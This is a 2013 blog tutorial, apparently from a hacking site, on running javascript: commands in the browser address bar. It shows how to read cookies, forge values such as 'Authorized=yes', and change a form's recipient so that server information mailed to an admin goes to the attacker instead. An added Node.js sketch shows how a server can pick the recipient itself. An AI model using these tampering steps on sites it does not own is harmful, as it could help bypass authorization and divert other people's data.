Friday 12 July 2013

Unknown

ADVANCED JAVASCRIPT INJECTION TUTORIAL


Summary: JavaScript injection is a nifty little technique that allows you to alter a site's contents without actually leaving the site. This can be very useful when, say, you need to spoof the server by editing some form options.

Examples will be explained throughout.
Contents:
I. Injection Basics
II. Cookie Editing
III. Form Editing
IV. Defacing

I. Injection Basics
JavaScript injections are run from the URL bar of the page you are visiting.
To use them, you must first completely empty the URL from the URL bar.
That means no http:// or whatever. JavaScript is run from the URL bar by using the javascript: protocol.
In this tutorial I will only teach you the bare bones of using this, but if you are a JavaScript guru, you can expand on this using plain old JavaScript.
The two commands covered in this tutorial are the alert(); and void(); commands. These are pretty much all you will need in most situations. For your first JavaScript, you will make a simple window appear. First go to any website and then type the following into your URL bar:
Code:
javascript:alert('Hello, Emmybxt');

You should get a little dialog box that says "Hello, Emmybxt". This will be altered later to have more practical uses. You can also run more than one command on the same line:
Code:

javascript:alert('Hello'); alert('Emmybxt');

This would pop up a box that says 'Hello' and then another that says 'Emmybxt'.

II. Cookie Editing
First off, check to see if the site you are visiting has set any cookies by using this script:
Code:

javascript:alert(document.cookie);
This will pop up any information stored in the site's cookies. To edit any information, we make use of the void(); command.
Code:

javascript:void(document.cookie="Field = myValue");
This command can either alter existing information or create entirely new values. Replace "Field" with either an existing field found using the alert(document.cookie); command, or insert your very own value. Then replace "myValue" with whatever you want the field to be. For example:
Code:

javascript:void(document.cookie="Authorized=yes");
This would either create the field "Authorized" or edit it to say "yes". Whether or not this does anything of value depends on the site you are injecting it on. It is also useful to tack an alert(document.cookie); onto the end of the same line to see what effect your change had.

III. Form Editing
Sometimes, to edit values sent to a given website through a form, you can simply download that HTML and edit it slightly to allow you to submit what you want. However, sometimes the website checks to see if you actually submitted it from the website you were supposed to. To get around this, we can just edit the form straight from JavaScript. Note: The changes are only temporary, so it's no use trying to deface a site through JavaScript injection like this.

Every form on a given webpage (unless named otherwise) is stored in the forms[x] array, where "x" is the number, in order from top to bottom, of all the forms in a page. Note that the forms start at 0, so the first form on the page would actually be 0, the second would be 1, and so on. Let's take this example:
Code:

<form action="http://www.website.com/submit.php" method="post">

Since this is the first form on the page, it is forms[0]. Say this form was used to email vital server information to the admin of the website. You can't just download the script and edit it, because the submit.php page looks for a referer.
You can check to see what value a certain form element has by using this script:
Code:

javascript:alert(document.forms[0].to.value);

This is similar to the alert(document.cookie); discussed previously. In this case, it would pop up an alert that says "admin@website.com". So here's how to inject your email into it.
You can use pretty much the same technique as the cookie editing shown earlier:
Code:

javascript:void(document.forms[0].to.value="email@nhacks.com");
This would change the email of the form to be "email@nhacks.com".
Then you could use the alert(); script shown above to check your work. Or you can couple both of these commands on one line.
More will be dropped. Keep checking!
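
The form edit works because submit.php takes the recipient from a field the browser controls and relies on the Referer header, which is also sent by the client. The following is an added example, not part of the original tutorial: a Node.js sketch that puts that weak handler beside one that picks the recipient on the server. The request shape, the "form" and "message" field names, the RECIPIENTS table and the contact.html path are assumptions made for illustration.

```javascript
// Added example: choosing the mail recipient on the server instead of trusting the form.

// Server-side configuration (assumed): which address each form delivers to.
const RECIPIENTS = { contact: 'admin@website.com' };

// Weak version, matching the behaviour the tutorial relies on: the recipient comes
// from the submitted "to" field and the only check is the Referer header.
function weakHandler(req) {
  if (!(req.headers.referer || '').startsWith('http://www.website.com/')) {
    return { status: 403 };
  }
  return { status: 200, sendTo: req.body.to };
}

// Hardened version: the client only names the form; the address is looked up
// server-side, and any submitted "to" value is ignored.
function hardenedHandler(req) {
  const formId = String(req.body.form || '');
  if (!Object.prototype.hasOwnProperty.call(RECIPIENTS, formId)) {
    return { status: 400 };
  }
  const message = String(req.body.message || '').slice(0, 2000);
  return { status: 200, sendTo: RECIPIENTS[formId], message };
}

// Constructed request: submitted from the real page after the "to" field was edited.
const edited = {
  headers: { referer: 'http://www.website.com/contact.html' },
  body: { form: 'contact', to: 'email@nhacks.com', message: 'server status' },
};
console.log(weakHandler(edited).sendTo);     // email@nhacks.com
console.log(hardenedHandler(edited).sendTo); // admin@website.com
```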

Comments:

Ifeanyibxt
17 July 2013 at 05:59

BRO PLEASE I DIDN'T UNDERSTAND IT. CAN YOU EXPLAIN?
